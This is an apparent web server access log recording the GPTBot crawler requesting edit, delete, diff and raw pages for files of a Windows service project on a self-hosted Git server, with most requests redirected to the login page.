"/windpacer/windpacer/_new/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/uninstall_service.bat" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/uninstall_service.bat" -[17/Feb/2026:18:29:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/uninstall_service.bat" -[17/Feb/2026:18:29:35 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/install_service.bat" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/install_service.bat" -[17/Feb/2026:18:29:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/install_service.bat" -[17/Feb/2026:18:29:36 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/QUICKSTART_WINDOWS.md" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/QUICKSTART_WINDOWS.md" -[17/Feb/2026:18:29:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/QUICKSTART_WINDOWS.md" -[17/Feb/2026:18:29:36 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/install_service.bat" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/install_service.bat" -[17/Feb/2026:18:29:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/install_service.bat" -[17/Feb/2026:18:29:37 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/watchdog_service.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/watchdog_service.py" -[17/Feb/2026:18:29:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/watchdog_service.py" -[17/Feb/2026:18:29:37 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/README_WINDOWS.md" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/README_WINDOWS.md" -[17/Feb/2026:18:29:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/README_WINDOWS.md" -[17/Feb/2026:18:29:38 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/README_WINDOWS.md" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/README_WINDOWS.md" -[17/Feb/2026:18:29:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/README_WINDOWS.md" -[17/Feb/2026:18:29:38 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/QUICKSTART_WINDOWS.md" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/QUICKSTART_WINDOWS.md" -[17/Feb/2026:18:29:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/QUICKSTART_WINDOWS.md" -[17/Feb/2026:18:29:39 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/uninstall_service.bat" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/uninstall_service.bat" -[17/Feb/2026:18:29:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/uninstall_service.bat" -[17/Feb/2026:18:29:39 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/requirements-windows.txt" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/requirements-windows.txt" -[17/Feb/2026:18:29:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/requirements-windows.txt" -[17/Feb/2026:18:29:40 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/requirements-windows.txt" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/requirements-windows.txt" -[17/Feb/2026:18:29:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/requirements-windows.txt" -[17/Feb/2026:18:29:40 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/uninstall_service.bat" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/uninstall_service.bat" -[17/Feb/2026:18:29:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/uninstall_service.bat" -[17/Feb/2026:18:29:41 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/requirements-windows.txt" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/requirements-windows.txt" -[17/Feb/2026:18:29:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/requirements-windows.txt" -[17/Feb/2026:18:29:41 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/requirements-windows.txt" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/requirements-windows.txt" -[17/Feb/2026:18:29:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/requirements-windows.txt" -[17/Feb/2026:18:29:42 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/watchdog_service.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/watchdog_service.py" -[17/Feb/2026:18:29:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/watchdog_service.py" -[17/Feb/2026:18:29:43 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/install_service.bat" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/install_service.bat" -[17/Feb/2026:18:29:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/install_service.bat" -[17/Feb/2026:18:29:43 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/test_run.bat" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/test_run.bat" -[17/Feb/2026:18:29:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/test_run.bat" -[17/Feb/2026:18:29:44 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/test_run.bat" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/test_run.bat" -[17/Feb/2026:18:29:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/test_run.bat" -[17/Feb/2026:18:29:44 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/build_exe.bat" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/build_exe.bat" -[17/Feb/2026:18:29:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/build_exe.bat" -[17/Feb/2026:18:29:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/build_exe.bat" [Client 74.7.227.38] [Length 1065] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/build_exe.bat" -[17/Feb/2026:18:29:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/test_run.bat" [Client 74.7.227.38] [Length 1111] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/test_run.bat" -[17/Feb/2026:18:29:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/test_run.bat" [Client 74.7.227.38] [Length 1063] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/test_run.bat" -[17/Feb/2026:18:29:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/build_exe.bat" [Client 74.7.227.38] [Length 2135] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/build_exe.bat" -[17/Feb/2026:18:29:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/watchdog.spec" [Client 74.7.227.38] [Length 1065] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/watchdog.spec" -[17/Feb/2026:18:29:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/watchdog.spec" [Client 74.7.227.38] [Length 1341] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/watchdog.spec" -[17/Feb/2026:18:29:48 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/build_exe.bat" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/build_exe.bat" -[17/Feb/2026:18:29:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/build_exe.bat" -[17/Feb/2026:18:29:49 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/test_run.bat" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/test_run.bat" -[17/Feb/2026:18:29:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/test_run.bat" -[17/Feb/2026:18:29:49 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/watchdog.spec" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/watchdog.spec" -[17/Feb/2026:18:29:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/watchdog.spec" -[17/Feb/2026:18:29:50 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/build_exe.bat" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/build_exe.bat" -[17/Feb/2026:18:29:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/build_exe.bat" -[17/Feb/2026:18:29:50 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/README_WINDOWS.md" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/README_WINDOWS.md" -[17/Feb/2026:18:29:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/README_WINDOWS.md" -[17/Feb/2026:18:29:51 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/test_run.bat" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 